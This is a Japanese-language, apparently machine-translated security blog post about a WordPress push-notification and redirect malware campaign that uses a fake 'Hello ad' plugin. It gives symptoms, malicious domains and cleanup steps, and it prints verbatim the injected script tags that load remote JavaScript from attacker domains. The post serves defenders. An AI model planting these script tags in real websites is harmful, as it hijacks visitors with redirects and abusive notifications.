ネットワークセキュリティー
 Computer >> コンピューター >  >> ネットワーキング >> ネットワークセキュリティー

WordPress のプッシュ通知とリダイレクト マルウェアを修正する方法

ここ数週間、Astra のセキュリティ研究者は WordPress 上のプッシュ通知マルウェアを追跡してきました。 .このキャンペーンは、WordPress Web サイトで進行中のリダイレクト キャンペーンと組み合わされています。

リダイレクトが発生している悪意のあるドメインには、inpagepush[.]com、asoulrox[.]com、iclickcdn[.]com、justcannabis[.]online、0.realhelpcompany[.]ga、fast.helpmart[.]ga/ などがあります。 m[.]js?w=085 など

今回、ハッカーは一歩先を行って、感染した WordPress Web サイトに正当に見える「Hello 広告」プラグインをインストールすることで、このハッキング キャンペーンをより巧妙にしました。詳しくは以下をご覧ください。

関連ガイド – 完全な WordPress ハックの除去 ガイド

プッシュ通知マルウェアの症状 – WordPress

<オール>
  • 下品なプッシュ通知: Web サイトにアクセスしたときに、訪問者に悪意のある/下品なプッシュ通知が表示される:

    WordPress のプッシュ通知とリダイレクト マルウェアを修正する方法

  • ウェブサイトのリダイレクト: 当社の Web サイトからリンクをクリックすると、悪意のあるページに Web サイトがリダイレクトされます (理想的には、WordPress 内のページに移動する必要があります)。

    WordPress のプッシュ通知とリダイレクト マルウェアを修正する方法

    inpagepush[.]com、asoulrox[.]com、iclickcdn[.]com など、Web サイトがリダイレクトしている可能性があるいくつかの URL。

  • 不明なプラグインが見つかりました: 場合によっては、新しい悪意のあるプラグインが「Hello ad」という名前で WordPress に追加されていることを確認しています。

  • デバイス固有/モバイル専用ウイルス: 私たちは、このマルウェアが自分自身を非常にうまく隠していることに気付きました。常にプッシュ通知を送信したり、ユーザーをリダイレクトしたりするとは限りません。動作はデバイス固有です。
    WordPress のプッシュ通知とリダイレクト マルウェアを修正する方法

    マルウェアは、モバイル デバイスにのみプッシュ通知を表示する場合もあれば、以前に Web サイトを開いたことがあるユーザーではなく、新しいユーザーのみをリダイレクトする場合もあります。
  • 悪意のある Hello Ad プラグインの奇妙なケース

    これらの悪意のある Web サイトに「Hello 広告」プラグインが追加され、ハッカーが制御する Web サイトにユーザーをリダイレクトすることが確認されています。

    この正当に見えるプラグインは、次の悪意のある Javascript コードをページ ソースに追加します:

    <script>(function(s,u,z,p){s.src=u,s.setAttribute('data-zone',z),p.appendChild(s);})(document.createElement('script'),'https://iclickcdn.com/tag.min.js',3336627,document.body||document.documentElement)</script>
    <script src="https://asoulrox.com/pfe/current/tag.min.js?z=3336643" data-cfasync="false" async></script>
    <script type="text/javascript" src="//inpagepush.com/400/3336649" data-cfasync="false" async="async"></script>
    WordPress のプッシュ通知とリダイレクト マルウェアを修正する方法

    このプラグインによって追加されたコードは、リダイレクトを行う上で重要な役割を果たします。ただし、ハッカーが進化し、新しいキャンペーンごとにこれを難読化しているのを見てきました.

    プッシュ通知マルウェア、Hello Ad &Redirection Hack キャンペーンを修正する方法

    <オール>
  • 明白な場所を確認してください: ハッカーには、ウイルス/マルウェア コードを挿入するお気に入りの場所がいくつかあります。 WordPressの修正を開始するときは、これらから始めるのが最善です.次のファイルを最初に確認する必要があります。
    • index.php
    • wp-content/themes/{themeName}/functions.php
    • wp-config.php
    • コア テーマ ファイル
    • .htaccess

  • Hello 広告プラグインを見つけて削除する: 開発者または過去にインストールした可能性のあるこの「正当に見える」プラグインを見つけた場合は、そうではないため、アンインストールしてください 🙂

    関連ガイド – WordPress マルウェアの除去
  • リダイレクトの削除: WordPress リダイレクト攻撃は、数か月前から発生しています。悪意のあるリダイレクト ハッキングに対処するには、データベース テーブル、コア テーマ ファイル、場合によってはサーバーの構成ファイルも調べる必要があります。未知の URL からロードされたスクリプト/リソースを探します。

    リダイレクト マルウェアは非常に蔓延しているため、リダイレクトのハッキングを修正するための詳細なステップバイステップ ビデオを作成しました。ハッカーは、セキュリティ会社のレーダーに引っかからないように、常に手法を更新し続けていますが、根本的な原則は同じです。

  • ハッカーは、世の中に知られていない脆弱性を悪用したり、さまざまなエクスプロイトを組み合わせてハッキングを作成したりして、常に手法を進化させています。ハッキングを削除することは 1 つの部分ですが、ハッキングされないようにするためには、Astra のセキュリティ スイートのような、より永続的なものが必要です 🙂


    1. Visbot マルウェア – 見つけて修正する方法

      ハッカーは、Magento 1.9 のクレジット カード情報をハッキングする巧妙な手法を使用しています。これには、コア ファイルを変更して Visbot マルウェアと呼ばれるマルウェアを追加することが含まれます。それを見つけて修正する方法を知るために読んでください。 Visbot マルウェアの仕組み ハッキングされた Magento Web サイトで見つかった Visbot マルウェアは、サイトが読み込まれるたびに実行されます。サーバーに対する POST リクエストを傍受し、訪問者がサイトに送信した情報を収集し、それを暗号化して画像ファイルに保存します。 この画像には、パスワード、住所

    2. プラグインに隠された WordPress PHP 実行マルウェアを修正する方法

      最近、WP Super Cache、Akismet、Elementor などの一般的な WordPress プラグインによって作成されたものと同様のファイル名と内容を持つ悪意のあるファイルをハッカーが隠しているサイトを発見しました。これらのファイル内のこのコードは、リダイレクト ハッキング、サーバー上での不明なファイルの作成、連絡先ページやニュースレターのスパムの原因となる可能性があり、ホスティング プロバイダーによってサイトが一時停止される可能性さえあります。プラグインに隠されたこのマルウェアとその削除方法について詳しく知りたい場合は、読み進めてください。 WP Super Cache Pl